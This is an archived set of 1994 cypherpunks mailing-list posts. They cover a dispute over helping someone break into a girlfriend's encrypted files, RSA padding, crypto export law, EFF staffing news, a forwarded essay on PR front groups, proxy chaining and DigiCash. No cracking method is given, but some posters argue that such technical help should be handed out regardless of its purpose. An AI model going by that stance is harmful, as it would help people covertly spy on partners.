Now if you are eighteen or so, or if you have retarded emotional development, the fact that it is real hard to get laid may seem positive and powerful proof that morality is indeed a grave threat to liberty.

But of course the fact that it is real hard to get laid is a result of sociobiology, not of cultural values and morality.

---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.
James A. Donald
jamesd at netcom.com

From jonathon.fletcher at psych.stir.ac.uk Sat Dec 24 01:19:28 1994
From: jonathon.fletcher at psych.stir.ac.uk (Jonathon Fletcher)
Date: Sat, 24 Dec 94 01:19:28 PST
Subject: Breaking into girlfriend's files
In-Reply-To:
Message-ID: <9412240917.AA23894@oss.stir.ac.uk>

James A. Donald writes:
> The criticism was that the proposed use of the knowledge was wrong
> -- not that the knowledge was wrong.
> Then there was a larger debate -- is morality a threat to liberty,
> or is coercion the only serious threat to liberty.

or that liberty is its own enemy. One individual's concept of liberty may infringe on another's to the point where one individual feels restricted by the other. The discussion could go on for hours.

My point was not that breaking into your girlfriend's files because you haven't got the guts to ask her something directly is somehow acceptable, personally I think it isn't acceptable. My point was that the list adopted the position of censor in deciding whether or not to 'release' information to the enquirer. That is what I disagree with.

The 'I should be able to read her files in case she's cheating on me' argument is only a matter of steps away from the 'I should be able to tap her phone in case she's cheating on me'.
> Now if you are eighteen or so, or if you have retarded emotional > development, I can't remember the former, and I can't associate with the latter, so I won't comment ;-) This is terribly off-topic. Responses by email - no more waste of list bandwidth please. -Jon -- Jonathon Fletcher, j.fletcher at stirling.ac.uk From blancw at pylon.com Sat Dec 24 01:58:19 1994 From: blancw at pylon.com (blancw at pylon.com) Date: Sat, 24 Dec 94 01:58:19 PST Subject: Breaking into girlfriend's files Message-ID: <199412240959.BAA16608@deepthought.pylon.com> Responding to msg by Black Unicorn, who is having a bad hair day (and so close to Christmas!): "Had I encrypted with Norton encrypt? I would have been deserving of whatever attack ensued." Are the cypherpunks all of one mind regarding ideals and morality? Had I inquired of the list how I could break into my dearest one's privacy, I would have been deserving of whatever commentary ensued regarding the disgusting implications of that act. "Disgusting. Get off this list, you belong on alt.codependency.recovery, or alt.bleeding.liberal." (Say - isn't this why Tim left for a bit? Oh, well.) "I may disagree with you, but I will defend to the death your right to express your [sanctimonious] opinion." (or something like that). .. Blanc From karn at unix.ka9q.ampr.org Sat Dec 24 03:11:54 1994 From: karn at unix.ka9q.ampr.org (Phil Karn) Date: Sat, 24 Dec 94 03:11:54 PST Subject: Thoughts on 15 day CJ crypto Message-ID: <199412241111.DAA01099@unix.ka9q.ampr.org> In article <94Dec16.08.5320 at qualcomm.com>, you write: |> So it's possible the RSA requirement is in there to provide an |> assurance that the right key was selected. Isn't it common practice to pad out a plaintext block with random garbage to the size of the modulus before you RSA-encrypt it? 
E.g., if you have an 8-byte DES key and you want to encrypt it with an RSA public key having a 512-bit modulus, you'd stick 56 bytes of random stuff in front of the DES key before you do the exponentiation. When you decrypt with the secret key, you simply throw away the random padding. At least RSAREF does this. Wouldn't this thwart the kind of attack you describe? Phil From david.lloyd-jones at canrem.com Sat Dec 24 03:18:12 1994 From: david.lloyd-jones at canrem.com (David Lloyd-Jones) Date: Sat, 24 Dec 94 03:18:12 PST Subject: EXPORT CONTROLS ON RC4 In-Reply-To: <199412240621.AAA24808@jpunix.com> Message-ID: <60.17995.6525.0C1C5829@canrem.com> This DDJ reference to export control laws is pretty typical: AS+From: nobody at jpunix.com (Anonymous) AS+ENCRYPTION software. Is posting such software online worldwide the same as +exporting it? If so, the State Department might have a thing or two to say. The State Department may claim the right to have some say in things under the Commerce Clause, Article 1, Sec. 8 of the Constitution. Seems to me, however, that the Fifth, Ninth and Tenth Amendments pretty clearly slap this claim down: the right to trade freely predates the United States, and is hence "reserved... to the people", in the language of the Tenth. -dlj. david.lloyd-jones at canrem.com * 1st 1.11 #3818 * But I'm a vegetarian. OK, let's eat you first. From bart at netcom.com Sat Dec 24 04:36:32 1994 From: bart at netcom.com (Harry Bartholomew) Date: Sat, 24 Dec 94 04:36:32 PST Subject: DDJ editorial Message-ID: <199412241236.EAA13217@netcom14.netcom.com> I think this sentence was missing a NOT: If, as some claim and RSA disputes, the code was reverse-engineered from object files in off-the-shelf software, then the law was probably broken - unless RSA and other vendors decide to test the strength of highly questionable and likely unenforceable shrink-wrap licenses that try to prohibit disassembly/decompilation. 
(But I don't have the DDJ to verify this) From ddt at lsd.com Sat Dec 24 05:39:21 1994 From: ddt at lsd.com (Dave Del Torto) Date: Sat, 24 Dec 94 05:39:21 PST Subject: FRAUD: Progress & Freedom on the Web-Frontier? Message-ID: Apologies for this not-so-crypto posting, but this is highly interesting for those who might've missed it. Note the references to our new $4M Newtonian Speaker of the House... dave ________________________________________________________________________ Speaking of "term limits," hasn't Rush Limbaugh gotten enough attention? =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= cut here =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From: Phil Agre T H E N E T W O R K O B S E R V E R VOLUME 1, NUMBER 12 DECEMBER 1994 ... The future of network politics. In the December 1994 issue of Wired (page 121) there appears an ad for something called The Progress and Freedom Foundation. Under the headline "Cyberspace: It's Nobody's Highway", this advertisement announces the availability of a "Magna Carta for the Knowledge Age". Small type at the bottom informs us that this document ... ... emerged from an August 23-24 conference in Atlanta, Georgia. Participants included Jerry Berman, Esther Dyson, John Gage, George Gilder, Jay Keyworth, Lewis Perelman, Michael Rothschild and Alvin Toffler. Major support for the conference was provided by BELLSouth and the Competitive Long Distance Coalition. Additional support was provided by Agorics Enterprises, Inc., AT&T, Cox Enterprises, J.L. Dearlove and Affiliates, Forbes, Scientific Atlanta, Video Tape Associates and Wired. Creative Consulting and Ad Production by J.L. Dearlove & Affiliates, Chicago, IL. Regarding the Magna Carta itself, it provides the e-mail address PFF at aol.com and some phone numbers, or, if you must, cross your fingers and send POM to 1250 H St. NW, Suite 550 Washington, DC 20005. Listen to the language. If you must? It's as though they're trying to talk jive to ingratiate themselves with the kids on the street. 
They don't even have a home page. So who are these folks? The ad says that: The Progress & Freedom Foundation believes cyberspace is a frontier, not a government project. We can learn a little more by turning to journalistic accounts. For example, in the 12/12/94 Wall Street Journal's article on Republican plans for the Food and Drug Administration (page A16), we read the following: In September, Rep. [Newt] Gingrich [incoming Speaker of the House] told a biotechnology trade group that he was launching a project to design a replacement for the FDA. Leading the effort is the Progress and Freedom Foundation, whose head, Jeffrey Eisenach, formerly ran Gopac, Mr. Gingrich's political action committee. Without apology, Mr. Eisenach acknowledges that drug companies are financial contributors to the foundation, and notes that drug companies will be involved in the project. And he dismisses suggestions that drug-company involvement could taint the results. "So I should go to Ralph Nader and do it?" he says. "That's silly". So the Progress and Freedom Foundation is active on more than just telecommunications issues. But it is not just an industry lobbying organization. In particular, the connection to Gopac is not at all coincidental. The purpose of Gopac has been to train conservative Republican candidates in the particularly aggressive style of politicking that Mr. Gingrich pioneered during his early days in Congress, and the Progress and Freedom Foundation may contribute to a generalization of this model. [By 1994] "Newt World" was now far-flung, from GOPAC to the National Republican Congressional Campaign Committee; the Friends of Newt Gingrich campaign committee; a weekly TV show on the conservative cable TV network, National Empowerment Television, and a think tank called the Progress and Freedom Foundation. Its messages were coordinated with talk-show hosts such as Rush Limbaugh and with Christian Coalition groups. [...] 
"The goal of this project is simple", Jeffrey A. Eisenach, director of the Progress and Freedom Foundation, wrote in a fund-raising letter. "To train, by April, 1996, 200,000-plus citizens into a model for replacing the welfare state and reforming our government." (LA Times 12/19/94, page A31) What can we expect from this rising army? The Gopac's record provides some evidence. Much has been written about the tactics that Gopac suggested to its candidates. An article about Gopac leader Joe Gaylord (Wall Street Journal, 8 December 1994, page A18), for example, says: Mr. Gaylord is one of the brains behind Gopac ... . [He] wrote its how-to textbook, which urges challengers to "go negative" early and "never back off". They must sometimes ignore voters' main concerns because "important issues can be of limited value". The book suggests looking for a "minor detail" to use against opponents, pointing to Willie Horton as a good example. Though it says a positive proposal also can be helpful, it counsels candidates to consider the consequences: "Does it help, or at least not harm, efforts to raise money?" Mr. Gingrich has called the book "absolutely brilliant". Even more has been written about the most famous Gopac document, ... a memo by Gingrich called "Language, a Key Mechanism of Control", in which the then-House minority whip gave candidates a glossary of words, tested in focus groups, to sprinkle in their rhetoric and literature. For example, it advised characterizing Democrats with such words as "decay, sick, pathetic, stagnation, corrupt, waste, traitors". (LA Times, 12/19/94, pages A31) In my view, though, the most significant feature of Newt World is not its language, which is certainly fascinating, or its association with industry, which is hardly surprising or novel, but rather its use of technology. Mr. Gingrich is a pioneer in the use of new technologies to build a political movement. 
I do have to hand it to him -- he has worked hard and he has a genius for political organizing. Having observed in the early 1980's that candidates spend a lot of dead time on the road traveling around during campaigns, he hit upon the idea of sending them videos and other materials about campaigning. This is what Gopac did. As time went on, they generalized this model to include scheduled conference calls and video broadcasts in which Mr. Gingrich and others would provide campaigners with advice about messages and methods. How does this model scale to 200,000-plus people? Well, at that point it starts to sound a lot like the information superhighway -- a technology for centralized broadcast of programs to a group that isn't the "mass audience" of conventional TV broadcasting but is distributed across the country. More tailored programming could be distributed as well -- to particular geographical regions, to activists on particular issues, and so forth. It's not a decentralized model like the Internet, but then it's not the political vision that normally goes with the Internet either. It's closer to the asymmetrical distribution model found in the plans of many cable and regional phone companies -- some of whom, you might recall, sponsored the Progress and Freedom Foundation's conference. This is not to say that Newt Gingrich and company are engaged in a conspiracy against the Internet. After all, Mr. Gingrich has made some encouraging statements about making Congressional materials available to citizens on the Internet, and this is certainly a good and laudable thing. The situation and the participants' views are often complicated. The point is that technologies are not neutral. Technologies certainly do not determine how they will be used, but neither are they simply tools that can be used for any old purpose at all. Rather, technologies and social forms evolve together, according to the affordances of the machinery and the forces of the social system. 
None of this coevolution goes simply or smoothly in practice, of course, nor is any of it inevitable. As the Internet illustrates extremely well, machines frequently have uses that nobody ever thought of, and these can often be resources for people wishing to engage in genuine, bottom-up democracy. The machines can't restore the health of our democracy, though -- we have to do that ourselves. And in doing so, we need to be aware of the complex and ambiguous interactions between the workings of our machinery and the forms of our political life. In particular, we should not assume that the Internet's open and decentralized architecture necessarily makes it a force for democracy, or that it necessarily levels the field for all players. The practice of politics on the Internet is increasingly complicated, with new kinds of players and new variations on the existing games. As a case study in these issues, let's consider an organization called the Wireless Opportunities Coalition. The WOC has circulated an alert on the net seeking support for a certain position in a fairly arcane regulatory fight within the FCC over the rules in certain frequency bands for digital wireless communications. The WOC's materials are also available on WWW: http://wireless.policy.net/wireless/wireless.html The basic idea of the WOC's arguments is that companies with very sensitive communications devices shouldn't be able to displace other users of certain frequencies, including low-power digital wireless communications used for educational purposes, for example in local community networking in areas that do not have high rates of telephone service. This certainly sounds like a good cause, and it probably even *is* a good cause. But note that the Wireless Opportunities Coalition, is a creation of a public relations firm called Issue Dynamics Inc, whose largest clients include Bell Atlantic and a lobbying alliance of the US regional phone companies. 
(To be fair, they also include the Democratic Senatorial Campaign Committee.) I couldn't find this information by searching through the WOC web pages, but you can verify it easily enough by aiming your web client at the underlying index: http://wireless.policy.net/ As recently as December 9th this page was entitled "IDI Index"; it is now, as of December 20th, called "Policy.Net". Click on "Issue Dynamics", read down to the bottom, and click on the IDI logo, which will take you to: http://idi.net/clients.html Why is it "idi.net" and not "idi.com"? Never mind. My point is not that these folks are evil or that they have no right to speak. My point is that they are a public relations firm practicing their craft on the Internet. In the future, I expect that ordinary citizens using the Internet will want to inform themselves about who's behind all of those slick web pages. Public relations and its place in society is a fascinating and important topic, and I encourage everyone to learn more about it. If you're interested, here is a brief reading list: Edward L. Bernays, The Engineering of Consent, Norman: University of Oklahoma Press, 1955. Bill Cantor, ed, Experts in Action: Inside Public Relations, New York: Longman, 1984. Oscar H. Gandy, Jr., Beyond Agenda Setting: Information Subsidies and Public Policy, Norwood, NJ: Ablex, 1982. Jack A. Gottschalk, Crisis Response: Inside Stories on Managing Image Under Siege, Detroit: Visible Ink, 1993. James E. Grunig and Todd Hunt, Managing Public Relations, New York: Holt, Rinehart and Winston, 1984. Elizabeth L. Toth and Robert L. Heath, eds, Rhetorical and Critical Approaches to Public Relations, Hillsdale, NJ: Erlbaum, 1992. Finally, let me close with a pertinent quote: "One practice which I believe should be eliminated is that of the so-called "paper front". A client is advised to finance an "organization" to promote or fight for its cause under the guise of an independent and spontaneous movement. 
This is a plain public deceit and fraud and of course is a technique developed with consummate skill and in great profusion by the Communists. In a free country any interest with a cause has a right to present its case to the public, to inform and, if possible, to persuade to its heart's content. But that right of free speech also carries the obligation that the source of it will be in the open for all to see. Attempts to fool the public by making it believe an "organization" existing only on paper is really a vociferous group favoring this or that cause have helped to cast a shadow upon the business of public relations counseling. No counsel who wants to preserve his own reputation will ever be a party to the issuance of any public statement by a client unless the source is clearly set forth. Obviously, when a client is involved in a public relations controversy, supporting statements are welcomed from every responsible source. But such statements should be issued by real-live people or organizations and not phoneys." This quote is from the autobiography of John W. Hill ("The Making of a Public Relations Man", recently republished by NTC Business Books, pages 139-140), who founded one of the largest public relations firms, Hill and Knowlton. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= end here =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From ddt at lsd.com Sat Dec 24 05:39:33 1994 From: ddt at lsd.com (Dave Del Torto) Date: Sat, 24 Dec 94 05:39:33 PST Subject: FYI: (Meeks) Berman leaves EFF Message-ID: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= cut here =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: Tue, 20 Dec 1994 17:04:23 -0800 From: "Brock N. 
Meeks"
Subject: CWD Changes in the Wind At EFF

CyberWire Dispatch // Copyright (c) 1994 //

Jacking in from the "Back to the Future" Port:

Washington, DC -- The Electronic Frontier Foundation has fired its Policy Director Jerry Berman and will soon release a sweeping new agenda for 1995 that promises to return the organization to its original grassroots beginning.

Asked to comment on his firing, Berman bristles and says: "I think that's baloney." Then he quickly adds: "Did you ever think I might have wanted to leave?"

Berman has, in fact, left EFF, to head a new, as yet unannounced, policy group called the Center for Democracy and Technology. His departure from EFF and the creation of CDT will be made public this week in a joint announcement with EFF, sources said.

The official line that will be spun to the public is that the two came to a "mutual parting of the ways." That benign statement, however, doesn't reflect the long hours of the behind the scenes deliberations, in which the language of the press releases will be as cautiously worded as an official State Department briefing.

Heroes and pioneers always take the arrows; EFF lately has looked more like a pin-cushion than its self-appointed role as protector of all things Cyberspace. The beleaguered organization has over the course of the past two years endured often withering criticism from the very frontier citizens it was sworn to uphold and protect.

The reason: A perceived move away from its grassroots activism to the role of a consummate Washington Insider deal maker.

Berman is the man largely responsible for cutting EFF's policy cloth. He wears the suit well. Maybe too well. Although he has the political acumen to arm-wrestle inside-the-beltway, it comes at the expense of his management style, EFF insiders said. Those shortcomings came at the expense of EFF's day-to-day operations and didn't go unnoticed by its board of directors.
The EFF board in October fired Berman for mismanaging the group's organizational and fiscal responsibilities. No impropriety or malfeasance was alleged, the board was simply dissatisfied with Berman's day-to-day managing of the shop. In a precursor to the board's October decision, it split Berman's job, giving him charge of just the policy arm, which board members said played to his strength. They then hired Andrew Taubman as executive director to oversee the day to day tasks. Separate from the organizational and fiscal misgivings, the board also couldn't brook with priority on policy affairs that Berman had engineered. Although Berman expertly navigated EFF through the choppy political waters of Washington, that course increasingly steered the organization away from its original vision as a populist group. Never was the hardcore policy-driven slant of EFF more apparent than during the two-plus year political firestorm that surrounded the FBI's infamous Digital Wiretap. The political wrangling during that time, in which Berman brokered the influence of EFF with the backing of the telephone, computer and software industries, to reach a compromise with legislators and the FBI on the bill's language, increasingly drove a wedge between the organization and its grassroots membership. Nobody within EFF interviewed for this article disagreed with how Berman ran his policy tour de force. In fact, the board was generally in agreement that Berman did an excellent job in helping to broker a less nefarious version of the FBI's wiretap bill than would have otherwise passed without his involvement on EFF's behalf. As effective as Berman was in shuffling between the political and ideological interests of EFF and its members, the "inside baseball" political bullshit was largely lost on the community of the Net, who viewed it as a kind of betrayal. 
The fact that there would be a backlash from the Net came as no surprise to Berman and EFF, who recognized the fine line they had to walk in dealing with a politically charged issue rivaled only by the Administration's insipid Clipper Chip encryption policy. You see, the Net community is a binary braintrust, a world of ones and zeros -- either on or off -- in which shades of grey are rarely an option. Yet it is exactly these shades of grey in which Berman excels and thrives. It is a skill -- and damn near an art form -- to be able to move among the shadows and Washington's land of a thousand different agendas. And that's right where Berman had steered EFF. However, it's not where the EFF board thought the organization belonged. And so, in a few days the Net community will read a grand announcement in which EFF and Jerry Berman state they've had a "mutual parting of the ways." The announcement will be several fold, including: -- The formation of Berman's new Center for Democracy and Technology. -- That EFF has hired current board member David Johnson, currently a computer law attorney with the Washington law firm of Wilmer, Cutler and Pickering, to be its new policy director, although that exact title has yet to be finalized. -- A new policy agenda for EFF that includes creation of an annual "State of the Net" report. EFF Executive Director Taubman declined to comment on Berman's firing, saying only that the organization and its former director had, indeed, agreed to a "mutual parting of the ways." He said EFF and Berman's new group would continue to work closely with each other and that the efforts of each would be mutually beneficial. 
Johnson said he was excited about the new policy efforts he would be heading up for EFF, which, in addition to the "State of the Net" report, includes commissioning papers and studies to help build a more solid idea of what exactly constitutes the Net "community" on a global basis and helping to define the Net's community as a recognizable legal entity. In addition to the new policy efforts, Johnson will have to restock EFF's policy department: All the EFF policy wonks have jumped ship, resigning their positions and joining with Berman's new venture. The upheaval at EFF -- which included moving the entire operation here to new digs in Washington -- apparently hasn't hurt morale which has "never been higher," Taubman said. Underscoring Taubman's remarks is EFF's on-line legal counsel Mike Godwin, who said the changes "create an opportunity for us to return to our more populist mission and vision that we started with." All Things Being Equal ================= Adversity for a political junkie is the warp and woof of Washington culture. Berman is no worse for the wear, having parachuted out of EFF and into his new organization. He said CDT will differ from EFF "on what to emphasize." That emphasis will be to focus on "on the ground public policy," he said. And it won't only be Berman's staff that sets the scene for familiarity as he jump starts CDT. The former EFF policy staffers will supply him with horsepower and his political currency will open doors. But he needs cold hard cash to feed the troops and pay the rent. That means his new organization must have financial backing and here, too, there are no strangers. Berman's bringing along a fair chunk of EFF's corporate sponsors to his new home. Companies providing seed money to Berman's CDT include AT&T, Bell Atlantic, Nynex, Apple Computer and Microsoft. These same companies provided a combined $235,000 in donations to EFF in 1993, minus Nynex, which wasn't listed as a major donor (over $5,000) on EFF's tax returns. 
It's not known if these companies will continue to fund EFF in full or in part or what amount they have pledged to Berman's group. Just how well-heeled CDT is and exactly who makes up the full roster of its sponsorship remains to be seen. We'll know that after the organization files its first tax returns, which will be a matter of public record. Meeks out... From unicorn at access.digex.net Sat Dec 24 06:22:53 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Sat, 24 Dec 94 06:22:53 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: On Sat, 24 Dec 1994, James A. Donald wrote: > Date: Sat, 24 Dec 1994 00:11:50 -0800 (PST) > From: James A. Donald > To: Jonathon Fletcher > Cc: cypherpunks at toad.com > Subject: Re: Breaking into girlfriend's files > > On Sat, 24 Dec 1994, Jonathon Fletcher wrote: > > > > It seems a little strange that cypherpunks are arguing over whether or > > not to disclose information about a (supposedly) cryptographic product > > to a certain individual. > > The criticism was that the proposed use of the knowledge was wrong > -- not that the knowledge was wrong. You can only go two ways with this, either of which is self defeating. 1> All potentially damaging information, by virtue of its potential "wrongful use" shall be banned. 2> All information clearly going to be used for the "wrong purposes" shall be restricted. There is simply no other way to restrict information as you propose. The result in 1>, I think is quite clear. The result in 2>, requires some ONE, some GROUP to decide what is and is not A> "clearly going to be used for," B> "the wrong purposes." Of course, now I want to know, what "objective" (read subjective to conventional wisdom) tests are going to be made to determine these criteria, who is going to make them, and who will enforce them? You end up with either a cut throat thought police regime, or slightly less offensive paternalistic censorship. You choose, what is it you want to have? 
A> complete amorality in that everything is restricted, (which is what restricting anything with potential harm essentially means), B> select morality, imposed by criteria lacking any objective element, as such criteria must always be subjective, or C> complete amorality in that everything is allowed. > > Then there was a larger debate -- is morality a threat to liberty, > or is coercion the only serious threat to liberty. > This completely evades the point. Your question refuses to acknowledge potential differences in the application and structure of morality. > Now if you are eighteen or so, or if you have retarded emotional > development, the fact that it is real hard to get laid may seem > positive and powerful proof that morality is indeed a grave threat > to liberty. > Evades the point, applies a silly analogy to Mr. Norton cracker, and then couples it with a crack about his potential age and mental facilities, a crack hardly as inappropriate as mine last night. > But of course the fact that it is real hard to get laid is a result > of sociobiology, not of cultural values and morality. Unless you're Christian and unmarried. > --------------------------------------------------------------------- > We have the right to defend ourselves and our > property, because of the kind of animals that we James A. Donald > are. True law derives from this right, not from > the arbitrary power of the omnipotent state. jamesd at netcom.com > -uni- (Dark) 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! 
From unicorn at access.digex.net Sat Dec 24 06:30:08 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Sat, 24 Dec 94 06:30:08 PST Subject: Breaking into girlfriend's files In-Reply-To: <199412240959.BAA16608@deepthought.pylon.com> Message-ID: On Sat, 24 Dec 1994 blancw at pylon.com wrote: > Date: Sat, 24 Dec 1994 01:59:07 -0800 > From: blancw at pylon.com > To: cypherpunks at toad.com > Subject: Re: Breaking into girlfriend's files > > Responding to msg by Black Unicorn, who is having a bad hair > day (and so close to Christmas!): I nominate this for understatement of the season. > "Had I encrypted with Norton encrypt? I would have been > deserving of whatever attack ensued." > > Are the cypherpunks all of one mind regarding ideals and > morality? Had I inquired of the list how I could break into > my dearest one's privacy, I would have been deserving of > whatever commentary ensued regarding the disgusting > implications of that act. In my view, this is absolutely so unless it is attached to censorship guised as moral correction. As I said, a proper response should have been the technical answer, followed by sage advice about the legality, and potential moral implications of use of the information as was proposed. > > "Disgusting. Get off this list, you belong on > alt.codependency.recovery, or alt.bleeding.liberal." > > (Say - isn't this why Tim left for a bit? Oh, well.) It is, and for this I owe the individual and the entire list an apology. Coupling an argument for censorship with some kind of moral judgement reacted so foully with my concept of information freedom that I became rather enraged. Not that this excuses my behavior of course. Lesson learned, wait 20 minutes after composing a message before sending the final draft. > "I may disagree with you, but I will defend to the death your > right to express your [sanctimonious] opinion." (or something > like that). > How does censorship align with this historic phrase? 
Censorship based on opinion of what is and is not appropriate use? > .. > Blanc > -uni- (Dark) 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From unicorn at access.digex.net Sat Dec 24 06:34:34 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Sat, 24 Dec 94 06:34:34 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: On Sat, 24 Dec 1994, James A. Donald wrote: > Date: Sat, 24 Dec 1994 00:01:19 -0800 (PST) > From: James A. Donald > To: cypherpunks at toad.com > Cc: Ian Farquhar > Subject: Re: Breaking into girlfriend's files > > On Fri, 23 Dec 1994, Ian Farquhar wrote: > > > > What a load of amoral rubbish. > > > On Fri, 23 Dec 1994, Black Unicorn wrote: > > By whose standard? Yours? > > Well I guess Black Unicorn's standards are not such that > one should entrust secrets to him. Absolutely not unless: 1> I am paid to keep them. 2> I am bound by an attorney-client relationship. 3> Ignore the above two in any absolute forms. But not for the reasons you suspect, in fact I submit the reverse is true. Clearly the distinction between the likelihood of someone keeping a secret and the advisability of disclosing damaging information to anyone, trustworthy or not (or protecting it insufficiently, or failing to research the methods you use to protect it), evades you. If you cannot see that my trustworthiness, when a significantly positive variable, is not the sole consideration in deciding if you should tell me something, you're in the wrong area of speculation. 
Further, if you cannot see that my hands off and nose out of where it doesn't belong position, makes me a MORE attractive individual to confide in, one less likely to turn your secrets over to the thought police, or to pass judgement based on some personal and artificial moral construct bearing only limited resemblance to any other, and being utterly unpredictable, then you're in the wrong area of speculation. Query: Who is likely to turn more evidence over to police in criminal matters? 1> "Trusted" family members. 2> "Amoral" attorneys who refuse to be blinded by conventional (read reactionary) morality? Who do you want knowing your secrets? (When anyone should know them at all) -uni- (Dark) > --------------------------------------------------------------------- > We have the right to defend ourselves and our > property, because of the kind of animals that we James A. Donald > are. True law derives from this right, not from > the arbitrary power of the omnipotent state. jamesd at netcom.com And I would submit, you, and you alone, the individual you, have the OBLIGATION to defend yourself and your property, and the RESPONSIBILITY to defend it lest the arbitrary power of the omnipotent state come in and do it for you. -uni- (Dark) 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From entropy at IntNet.net Sat Dec 24 06:39:14 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Sat, 24 Dec 94 06:39:14 PST Subject: HTTP redirectors In-Reply-To: <199412202135.NAA21822@jobe.shell.portal.com> Message-ID: > One idea that was suggested here would be to have a local proxy process, > a very simple one which your fancy client connected to for all your net > accesses. This would be where you would implement encryption, or new > protocols for chaining, etc. 
This way we don't have to try to persuade > client writers to incorporate our improvements; the existing proxy > support provides the loophole we need. One nice feature, for example, > would be a full 128 bit IDEA or RC4 encryption engine so that overseas > Netscape users (or domestic ones who are stuck with crippled versions) > can get good security. Indeed. Then you could set your proxyserver to: http://localhost:4242/CHAIN:3/ ... which would connect to the local wedge on 4242, tell it to chain, and pass the URL to go to. Hopefully then the wedge could pick another one out of a local list and connect to it, passing: CHAIN:2, ad infinitum. It really does not seem to be very technically difficult. Once again, it comes down to "who's willing to run these beasts?" -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://hyperreal.com/~entropy/ ]-------[ Key-ID: 4082CCB5 ) From nesta at nesta.pr.mcs.net Sat Dec 24 06:46:37 1994 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Sat, 24 Dec 94 06:46:37 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: On Sat, 24 Dec 1994, Black Unicorn wrote: > You can only go two ways with this, either of which is self defeating. > > 1> All potentially damaging information, by virtue of its potential > "wrongful use" shall be banned. > > 2> All information clearly going to be used for the "wrong purposes" > shall be restricted. > > > There is simply no other way to restrict information as you propose. > How about simply giving the information if you feel like it, and withholding it if you don't. And don't bother whether other people give it to him. A simple individual choice without attempting to set guidelines for morality or any of that worthless shit. 
i want to know everything http://www.mcs.com/~nesta/home.html i want to be everywhere Nesta's Home Page i want to fuck everyone in the world & i want to do something that matters /-/ a s t e zine From entropy at IntNet.net Sat Dec 24 06:49:15 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Sat, 24 Dec 94 06:49:15 PST Subject: No privacy with DigiCash In-Reply-To: <199412210221.SAA18077@jobe.shell.portal.com> Message-ID: > This is a really bad way of doing it IMO because it seems to defeat > one of the big selling points of DigiCash. Is there something I am > overlooking, some way to buy things privately with DigiCash? I don't think so. It appears that the initial implementation of DigiCash works exactly that way [based on what I've read on their W3 server]. Of course, I could tell you more exactly had they replied to any of my four separate attempts to try it out .. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://hyperreal.com/~entropy/ ]-------[ Key-ID: 4082CCB5 ) From pstemari at erinet.com Sat Dec 24 06:53:02 1994 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Sat, 24 Dec 94 06:53:02 PST Subject: FRAUD: Progress & Freedom on the Web-Frontier? Message-ID: <9412241444.AA05897@eri> At 05:39 AM 12/24/94 -0800, Dave Del Torto forwarded someone else's writings: [...] > Even more has been written about the most famous Gopac document, > > ... a memo by Gingrich called "Language, a Key Mechanism of > Control", in which the then-House minority whip gave candidates > a glossary of words, tested in focus groups, to sprinkle > in their rhetoric and literature. For example, it advised > characterizing Democrats with such words as "decay, sick, > pathetic, stagnation, corrupt, waste, traitors". (LA Times, > 12/19/94, pages A31) Paging Prof. Chomsky, paging Prof. Chomsky... 
This is exactly the sort of information manipulation that can create a chain reaction on the net. The infamous modem tax is a good example of this sort of cascade effect. Use of "hot button" terms can produce astonishing effects. > How does this model scale to 200,000-plus people? Well, at that > point it starts to sound a lot like the information superhighway > -- a technology for centralized broadcast of programs to a group > that isn't the "mass audience" of conventional TV broadcasting > but is distributed across the country. More tailored programming > could be distributed as well -- to particular geographical > regions, to activists on particular issues, and so forth. It's > not a decentralized model like the Internet, but then it's not > the political vision that normally goes with the Internet either. > It's closer to the asymmetrical distribution model found in the > plans of many cable and regional phone companies -- some of whom, > you might recall, sponsored the Progress and Freedom Foundation's > conference. Yawn--this is the same old crappy broadcast paradigm that every govt drone that has looked at the net insists on regurgitating out of their craw. The nature of the net is that everyone is a broadcaster, and the concept of a band of Newt-clones spamming the net is annoying. It's good that these people are this clueless--someone that selectively and judiciously inserted a few posts here and there on appropriate newsgroups could have quite an effect, given an understanding of the language manipulation techniques mentioned above. > As a case study in these issues, let's consider an organization > called the Wireless Opportunities Coalition. The WOC has [posted a web page with minimal credits for sponsorship] > Why is it "idi.net" and not "idi.com"? Never mind. My point > is not that these folks are evil or that they have no right > to speak. My point is that they are a public relations firm > practicing their craft on the Internet. 
